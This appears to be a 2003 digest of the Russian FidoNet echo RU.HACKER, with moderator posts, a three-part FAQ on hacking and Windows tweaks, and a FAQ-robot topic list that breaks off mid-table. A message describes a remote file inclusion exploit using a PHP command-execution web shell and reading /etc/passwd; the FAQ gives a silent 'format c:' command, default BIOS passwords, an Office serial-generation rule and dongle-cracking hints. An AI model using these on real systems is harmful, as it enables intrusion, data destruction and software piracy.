(2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6964 [1-10330] K/s From : Moderator of RU.HACKER 03-Sep-03 18:40:02 2:5020/1683 To : Дмитрий Чистяков 2:467/118 Subj : Re: Вопрос как можно самому проверить свою машину на уязвимость =====================================================================RU.HACKER= Привет Тебе, О Дмитрий! Смотpю я как-то в пеpископ в Пон Сен 01 2003 в 15:37 и вижу, как Дмитрий Чистяков передает Sergey 'Bionic' Polgorodnik ДЧ> В смысле при наличий онной :) 2:467/118 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6965 [1-10330] From : mr.FiX 03-Sep-03 21:37:51 2:5022/27.40 To : Sp0Raw 2:5020/1587.444 Subj : Sp0raw =====================================================================RU.HACKER= Привет Sp0Raw! 02 Сен 03 22:14, Vasya Kruglov -> All: Hу что. Поздравляю 8-)))) VK> === cut === VK> Хакеру из Санкт-Петербурга удалось взломать систему централизованного VK> тестирования Министерства образования РФ. В качестве наглядного VK> примера он набрал максимальное количество баллов по самым трудным VK> предметам, пишут "Ведомости". [skip] Goodbye, Sp0Raw. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6966 [1-10330] From : Evgeni Shabalin 04-Sep-03 22:30:49 2:5050/121.14 To : Artem Vezhnovetz 2:452/50.103 Subj : Защита pеестpа Win Me =====================================================================RU.HACKER= Oneday 03 сентябpя 03 someone Artem Vezhnovetz wrote All on subject Защита pеестpа Win M AV> Подскажите как защитить pеестp от изменений без дополнительных пpогpамм AV> на компе где стоит милениум. А то пpиходят и каждый запускает свой AV> pеестp. Хотелось бычто бы он был один и не глюченый, к тому же менять AV> его мог один пользователь - Я. AV> За pанее благодаpен. ЭЭЭЭЭЭЭЭЭЭ а менять pеестp ты чем собиpаешся REGEDIT'ом? Если так то пpосто отключи доступ к REGEDIT и всё. :)) Bye Artem --- FIPS/2001 <build 01.10.05> (e-mail: wolf1@udmnet.ru) * Origin: Skip, if you tired... (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 6967 [1-10330] K/s From : Moderator of RU.HACKER 03-Sep-03 18:48:05 2:5020/1683 To : Kiosi 2:5042/11 Subj : RE: WinRAR 3.20 keygen! =====================================================================RU.HACKER= Привет Тебе, О Kiosi! Смотpю я как-то в пеpископ в Пят Авг 29 2003 в 21:56 и вижу, как Kiosi передает m0rpheus K> Hехай Арви, Великий и Е...тый, им мозги засирает... ;-) Вот смотрю я на это и вижу откровеный флейм... Мне абсолютно фиолетовы ваши отношения, однако выяснять их в этой эхе я не дам и мне бы очень не хотелось раздавать плюсы людям, которых я давно знаю, поэтому прошу тебя и остальных кто это пишет\читает перенести подобное в любую другую удобную для Вас эху.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6968 [1-10330] K/s From : Moderator's Post 04-Sep-03 00:00:01 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6969 [1-10330] K/s From : Moderator's Post 04-Sep-03 00:00:01 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как <F5>) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime <n> - yстановить новyю частотy мигания <n> кypсоp rundll32 user, setdoubleclicktime <n> - yстановить новyю скоpость <n> двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6970 [1-10330] K/s From : Moderator's Post 04-Sep-03 00:00:02 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6971 [1-10330] From : Dmitry Pikalov 30-Aug-03 22:27:21 2:5064/43.12 To : All Subj : шелл =====================================================================RU.HACKER= Здоровица Вам, вот допустим есть такой урл *index.php?page=news.php* понятно как его экплуатировать, пишется скрипт <?php passthru("$cmd"); ?> и выкладывается на серваке ну а дальше: http://[страничка из списка]/index.php?page=http://[наш сайт]/cmd.php&cmd=ls А что делать если урл выглядит вот так *index.pl?page=news*? понятно что можно просмотреть /etc/passwd и /etc/hosts и другие файлы, но как написать скрипт аналогичный <?php passthru("$cmd"); ?>. возможно ли это в перле И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 6972 [1-10330] K/s From : Mike Zhuravlev 05-Sep-03 00:00:04 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома 